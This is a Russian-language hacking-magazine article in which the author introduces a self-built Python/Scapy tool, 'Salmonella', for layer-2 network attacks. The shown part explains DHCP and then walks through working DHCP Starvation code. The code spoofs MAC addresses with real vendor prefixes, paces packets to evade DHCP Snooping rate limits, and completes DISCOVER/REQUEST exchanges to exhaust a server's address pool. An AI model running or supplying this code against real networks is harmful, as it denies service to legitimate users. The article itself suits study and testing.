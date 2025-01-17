В этой статье я поз­наком­лю тебя с ата­ками EIGRP Abusing K-values, DTP Spoofing, DHCP Starvation, CAM Table Overflow и еще нес­коль­кими. Что­бы про­иллюс­три­ровать их, я при­веду код на Python, который исполь­зовал для соз­дания сво­его, более мощ­ного ана­лога ути­литы Yersinia.

Задумка

Как‑то раз, ког­да я был сту­ден­том треть­его кур­са, у меня сто­яла задача написать кур­совую работу по тех­никам про­веде­ния атак на DHCP-сер­вер. Взяв эту тему, я начал вни­кать: что это за про­токол, как он работа­ет, какие есть ата­ки и так далее. Ког­да с теорией было покон­чено, дело оста­валось за малым: показать на прак­тике, как я реали­зовал ата­ку на DHCP-сер­вер. С прог­рамми­рова­нием я тог­да был зна­ком мало и уж точ­но не знал о том, как работа­ет манипу­ляция сетевы­ми пакета­ми.

Я начал копать под­ходящие тул­зы. Мое вни­мание прив­лекла Yersinia — ути­лита, в которую вхо­дят инс­тру­мен­ты для про­веде­ния атак на про­токо­лы L2, в том чис­ле и на DHCP. Она показа­лась мне мно­гообе­щающей и отно­ситель­но лег­кой в обра­щении и понима­нии. Я взял­ся за дело с энту­зиаз­мом, но доволь­но ско­ро я уже рас­качивал­ся перед экра­ном, дер­жась руками за голову. Что‑то явно шло не так.

Ни­како­го резуль­тата добить­ся не уда­валось, и спус­тя некото­рое вре­мя я таки выяс­нил, что проб­лема не в недос­татке у меня зна­ний, а в том, что сама тул­за не работа­ет как положе­но. Имен­но тог­да мне приш­ла в голову мысль написать свое, пра­виль­но работа­ющее при­ложе­ние.

Мо­жет быть, ата­ки на DHCP с Yersinia при некото­рых усло­виях про­вер­нуть и мож­но, но ата­ки на дру­гие про­токо­лы каналь­ного уров­ня не работа­ли вов­се! К тому же по час­ти юза­били­ти Yersinia хро­мала на обе ноги.

При­веду при­мер проб­лемы: если выб­рать ата­ку на совер­шенно любой про­токол, то в ответ поль­зователь не получа­ет прак­тичес­ки никакой информа­ции о ста­тусе ата­ки — запуще­на она или не запуще­на, перех­вачены какие‑либо пакеты или не перех­вачены, воз­никла ошиб­ка или нет и так далее.

По­мучив­шись с этим, я пре­исполнил­ся решимос­ти писать адек­ватную замену. К тому же была мысль реали­зовать под­дер­жку боль­шего чис­ла про­токо­лов. Нап­ример, Yersinia не работа­ет с про­токо­лами динами­чес­кой мар­шру­тиза­ции.

Концепция

Для раз­работ­ки я взял Python и биб­лиоте­ку Scapy, пред­назна­чен­ную для краф­тинга сетевых пакетов. В сум­ме это два мощ­ней­ших и отно­ситель­но прос­тых в исполь­зовании инс­тру­мен­та.

Вдо­бавок к это­му я решил соз­дать собс­твен­ное гра­фичес­кое при­ложе­ние, ана­логич­ное Yersinia, но с кор­рек­тно работа­ющи­ми ата­ками на сетевые про­токо­лы.

В качес­тве UI-биб­лиоте­ки я решил для начала взять что‑нибудь прос­тое и выб­рал CustomTkinter.

Свое детище я наз­вал Salmonella — тоже семей­ство энте­робак­терий по ана­логии с Yersinia.

Я вижу вза­имо­дей­ствие с при­ложе­нием так. На глав­ном экра­не я выбираю инте­ресу­ющий меня про­токол.

Да­лее мне пред­лага­ется выб­рать тех­нику ата­ки на этот про­токол.

Пос­ле выбора ата­ки откры­вает­ся отдель­ное окно, в котором мож­но вво­дить парамет­ры ата­ки, прос­лушивать сеть и так далее.

Прис­тупа­ем к кодиро­ванию!

DHCP

Моя пер­вая статья в «Хакере» как раз была пос­вящена теме атак на DHCP. В ней я под­робно писал, в час­тнос­ти, о том, что это за про­токол и какими сооб­щени­ями он опе­риру­ет. Здесь я пов­торю лишь основные тезисы.

Со­обще­ния DHCP. Для нор­маль­ной работы DHCP тре­бует­ся все­го четыре сооб­щения: DISCOVER, OFFER, REQUEST, ACK, запом­нить которые очень лег­ко по пер­вым бук­вам — DORA.

Кли­ент исполь­зует сооб­щение DISCOVER, что­бы най­ти DHCP-сер­веры. Если сер­вер получа­ет такое сооб­щение, он отправ­ляет кли­енту сооб­щение OFFER, где ука­зыва­ет сетевые парамет­ры, пред­лага­емые кли­енту. Если сер­веров нес­коль­ко, то каж­дый из них отве­тит.

Как пра­вило, кли­ент отве­чает тому сер­веру, сооб­щение которо­го приш­ло пер­вым. В ответ кли­ент шлет сооб­щение REQUEST. Сер­вер, уви­дев, что кли­ент при­нял его пред­ложение, резер­виру­ет пред­ложен­ный кли­енту IP-адрес у себя в памяти и отправ­ляет пос­леднее сооб­щение ACK, которое под­твержда­ет, что теперь кли­ент может исполь­зовать выдан­ные ему сетевые парамет­ры.

DHCP Starvation

Мы зна­ем, что DHCP-сер­вер ведет таб­лицу соот­ветс­твий выдан­ных кли­ентам IP-адре­сов и их MAC-адре­сов и что уже выдан­ный IP-адрес нель­зя пред­лагать дру­гому кли­енту. Суть ата­ки DHCP Starvation в том, что­бы «исто­щить» сер­вер DHCP, отправ­ляя лож­ные пакеты типа DHCPDISCOVER с ран­домны­ми MAC-адре­сами источни­ка. Сер­вер будет реаги­ровать на эти пакеты и резер­вировать сво­бод­ные IP-адре­са из пула, в резуль­тате чего некото­рое вре­мя (пока ата­ка в активной фазе) не смо­жет выдавать IP-адре­са обыч­ным поль­зовате­лям.

У Yersinia есть ряд проб­лем с ата­ками DHCP Starvation.

Пер­вая и глав­ная проб­лема — отправ­ка лишь сооб­щений DISCOVER. Вспом­ним, что для успешно­го вза­имо­дей­ствия кли­ент и сер­вер дол­жны отпра­вить друг дру­гу по два сооб­щения. Yersinia отправ­ляет толь­ко одно сооб­щение: пос­ле получе­ния OFFER от сер­вера она не шлет свой REQUEST, из‑за чего вза­имо­дей­ствие кли­ента и сер­вера не счи­тает­ся успешно завер­шенным. Имен­но поэто­му DHCP-сер­вер резер­виру­ет IP-адрес лишь через нес­коль­ко минут пос­ле того, как пред­ложил его кли­енту в сооб­щении OFFER.

Вто­рая проб­лема — груп­повые MAC-адре­са. В сооб­щени­ях DISCOVER в поле источни­ка Ethernet-кад­ра иног­да ука­зыва­ются груп­повые MAC-адре­са. DHCP-сер­вер не вос­при­нима­ет такие сооб­щения и прос­то игно­риру­ет их. А таким может быть каж­дое вто­рое сооб­щение.

Третья проб­лема: цель Yersinia — не исто­щить DHCP-сер­вер, а задушить отправ­кой огромно­го количес­тва DISCOVER-пакетов, что, по сути, явля­ется DoS.

Все эти проб­лемы я решил. Пос­мотрим на интерфейс ата­ки DHCP Starvation в моей ути­лите.

Тут мож­но ука­зать количес­тво отправ­ляемых пакетов, задать интервал для отправ­ки сооб­щений DISCOVER, выб­рать интерфейс и IP-адрес DHCP-сер­вера (если их нес­коль­ко и нужен кон­крет­ный). Воз­можность задать интервал отправ­ки для пакетов DISCOVER я добавил для обхо­да rate-limit у DHCP Snooping.

Те­перь давай пос­мотрим на код. Для начала я опре­деляю, какие выб­раны парамет­ры, и сох­раняю поль­зователь­ский ввод в перемен­ных:

# Если количество пакетов определяется вводом с клавиатуры if radiobutton_number_of_packages_var . get ( ) == 1 : number_of_packages = int ( entry_number_of_packages . get () ) + 1 # Если количество пакетов определяется выбором из комбобокса if radiobutton_number_of_packages_var . get ( ) == 2 : if combobox_number_of_packages . get ( ) == " / 20 ( 4096 addresses) " : number_of_packages = 4097 if combobox_number_of_packages . get ( ) == " / 21 ( 2048 addresses) " : number_of_packages = 2049 if combobox_number_of_packages . get ( ) == " / 22 ( 1024 addresses) " : number_of_packages = 1025 if combobox_number_of_packages . get ( ) == " / 23 ( 512 addresses) " : number_of_packages = 513 if combobox_number_of_packages . get ( ) == " / 24 ( 256 addresses) " : number_of_packages = 257 if combobox_number_of_packages . get ( ) == " / 25 ( 128 addresses) " : number_of_packages = 129 if combobox_number_of_packages . get ( ) == " / 26 ( 64 addresses) " : number_of_packages = 65 if combobox_number_of_packages . get ( ) == " / 27 ( 32 addresses) " : number_of_packages = 33 if combobox_number_of_packages . get ( ) == " / 28 ( 16 addresses) " : number_of_packages = 17 if combobox_number_of_packages . get ( ) == " / 29 ( 8 addresses) " : number_of_packages = 9 if combobox_number_of_packages . get ( ) == " / 30 ( 4 addresses) " : number_of_packages = 5 # Если выбран определенный DHCP-сервер if radiobutton_dhcp_server_var . get ( ) == 2 : dhcp_server = entry_dhcp_server . get ( ) # Если чекбокс не активен, то по умолчанию интервал равен нулю if checkbox_interval_var . get ( ) == " off " : interval = 0 if checkbox_interval_var . get ( ) == " on " : interval = int ( combobox_interval . get () )

Итак, если не выб­ран опре­делен­ный IP-адрес DHCP-сер­вера:

# Если в качестве IP-адреса DHCP-сервера выбран любой IP-адрес if radiobutton_dhcp_server_var . get ( ) == 1 : # Устанавливаем счетчик отправленных пакетов для уведомлений и диагностики packages_sent = 0 # Устанавливаем цикл, по количеству итераций равный количеству отправляемых пакетов for i in range ( 1 , number_of_packages ) : # Функция для представления MAC-адреса в виде байтов def mac_to_bytes ( mac_addr : str ) -> bytes : return int ( mac_addr . replace ( " : " , "" ) , 16 ) . to_bytes ( 6 , " big " ) # Формируем OUI mac_list = [ " 04: b0: e7: " , " 18: 1e: b0: " , # HUAWEI/ Samsung " b8: ca: 3a: " , " fc: 08: 4a: " , # Dell/ Fujitsu " 00: 25: 2e: " , " 2c: c2: 53: " , # Cisco/ Apple " c4: 65: 16: " , " 38: d5: 47: " , # HP/ ASUS " e4: 1f: 13: " , " 9c: 32: ce: " , # IBM/ Canon " d0: 28: ba: " , " 6c: 24: 83: " , # Realme/ Microsoft " 44: 90: 46: " , " 74: d4: 35: " , # HONOR/ GIGABYTE " 88: 70: 8c: " , " 90: e8: 68: " , # Lenovo/ AzureWave " a4: 1a: 6e: " , " d0: c7: c0: " , # ZTE/ TPlink " c8: 13: 37: " , " 00: 05: c9: " , # Juniper/ LG " 24: 21: ab: " , " fc: 75: 16: " , # Sony/ D-Link " 60: 9c: 9f: " , " 00: 00: aa: " ] # Brocade/ Xerox # Генерируем оставшиеся три байта mac = [ random . randint ( 0x00 , 0x7f ) , random . randint ( 0x00 , 0x7f ) , random . randint ( 0x00 , 0x7f ) ] # Приводим их в вид MAC-адреса client_mac = ' : ' . join ( map ( lambda x : ' %02x ' % x , mac ) ) # Генерируем уникальный идентификатор транзакции для четырех сообщений DORA xid = random . randint ( 0x00000000 , 0xffffffff ) # Объединяем OUI и вторые три байта client_mac = random . choice ( mac_list ) + client_mac

Уже пред­вку­шаю воп­росы про спи­сок mac_list ! Сей­час пояс­ню.

Как я уже говорил, DHCP-сер­вер не реаги­рует на сооб­щения DHCP, в которых в качес­тве MAC-адре­са источни­ка ука­зан груп­повой MAC. Я начал исполь­зовать гло­баль­ные уни­каль­ные MAC-адре­са (с помощью RandMAC( ) ), но резуль­тат ока­зал­ся таким же: мой DHCP-сер­вер на роуте­ре Cisco игно­риро­вал сооб­щение DISCOVER, а в Wireshark оно выг­лядело так, как буд­то я исполь­зовал груп­повые MAC-адре­са:

Source MAC must not be a group address

Тог­да я нашел инте­рес­ную информа­цию по это­му воп­росу:

MAC-адрес, ука­зан­ный/записан­ный Wireshark, не явля­ется извес­тным MAC-адре­сом, а пред­став­ляет собой слу­чай­ный MAC-адрес

То есть MAC-адрес дол­жен узна­вать­ся по пер­вым трем бай­там. Таким обра­зом, я погуг­лил и соб­рал пер­вые три бай­та (OUI) для обо­рудо­вания наибо­лее извес­тных вен­доров и сос­тавил спи­сок mac_list . При каж­дой генера­ции MAC-адре­са про­исхо­дит выбор слу­чай­ного OUI из это­го спис­ка.

Да­лее генери­рует­ся вто­рая (слу­чай­ная) часть MAC-адре­са и объ­еди­няет­ся с OUI слу­чай­но выб­ранно­го вен­дора. Уни­каль­ный гло­баль­ный MAC готов! Мой роутер Cisco стал реаги­ровать на каж­дый MAC-адрес, сге­нери­рован­ный таким обра­зом.

В сле­дующем бло­ке кода непос­редс­твен­но генери­руют­ся сооб­щения DHCP DISCOVER:

discover_packet = Ether ( src = client_mac , dst = " ff: ff: ff: ff: ff: ff " ) / \ IP ( src = " 0. 0. 0. 0 " , dst = " 255. 255. 255. 255 " ) / \ UDP ( sport = 68 , dport = 67 ) / \ BOOTP ( op = 1 , chaddr = mac_to_bytes ( client_mac ) , xid = xid ) / \ DHCP ( options = [ ( " message-type " , " discover " ) , " end " ] ) response_for_discover = srp1 ( discover_packet , timeout = 2 , verbose = 0 , iface = combobox_interface . get () )

От­прав­ляем сооб­щение discover_packet методом srp1 и ждем один ответ.

Даль­ше ана­лизи­руем получен­ный ответ. Запишем его в перемен­ную response_for_discover :

# Если ответ был получен и это DHCP OFFER if response_for_discover and response_for_discover [ DHCP ] . options [ 0 ] [ 1 ] == 2 : options = response_for_discover [ DHCP ] . options for i , item in enumerate ( options ) : if item [ 0 ] == ' server_id ' : server_id = i if item [ 0 ] == ' router ' : router = i if item [ 0 ] == ' lease_time ' : lease_time = i if item [ 0 ] == ' subnet_mask ' : subnet_mask = i if item [ 0 ] == ' name_server ' : name_server = i request_packet = Ether ( src = client_mac , dst = " ff: ff: ff: ff: ff: ff " ) / \ IP ( src = " 0. 0. 0. 0 " , dst = " 255. 255. 255. 255 " ) / \ UDP ( sport = 68 , dport = 67 ) / \ BOOTP ( op = 1 , chaddr = mac_to_bytes ( client_mac ) , xid = xid ) / \ DHCP ( options = [ ( " message-type " , " request " ) , ( " requested_addr " , response_for_discover [ BOOTP ] . yiaddr ) , ( " server_id " , response_for_discover [ DHCP ] . options [ server_id ] [ 1 ]) , ( " router " , response_for_discover [ DHCP ] . options [ router ] [ 1 ]) , ( " name_server " , response_for_discover [ DHCP ] . options [ name_server ] [ 1 ]) , ( " subnet_mask " , response_for_discover [ DHCP ] . options [ subnet_mask ] [ 1 ]) , ( " lease_time " , int ( response_for_discover [ DHCP ] . options [ lease_time ] [ 1 ])) , " end " ] ) response_for_request = srp1 ( request_packet , timeout = 5 , verbose = 0 , iface = combobox_interface . get () )

Из сооб­щения OFFER, в котором DHCP-сер­вер пред­лага­ет нам свои сетевые парамет­ры (IP-адрес, мас­ка сети, IP-адрес DHCP-сер­вера, IP-адрес шлю­за по умол­чанию, DNS-сер­вер и вре­мя арен­ды), мы записы­ваем их в соот­ветс­тву­ющие перемен­ные. Часть этих парамет­ров пред­став­лена в виде опций. Это далеко не все парамет­ры, которые сер­вер пред­лага­ет кли­енту, но их дос­таточ­но, что­бы кли­ент мог нор­маль­но работать в сети.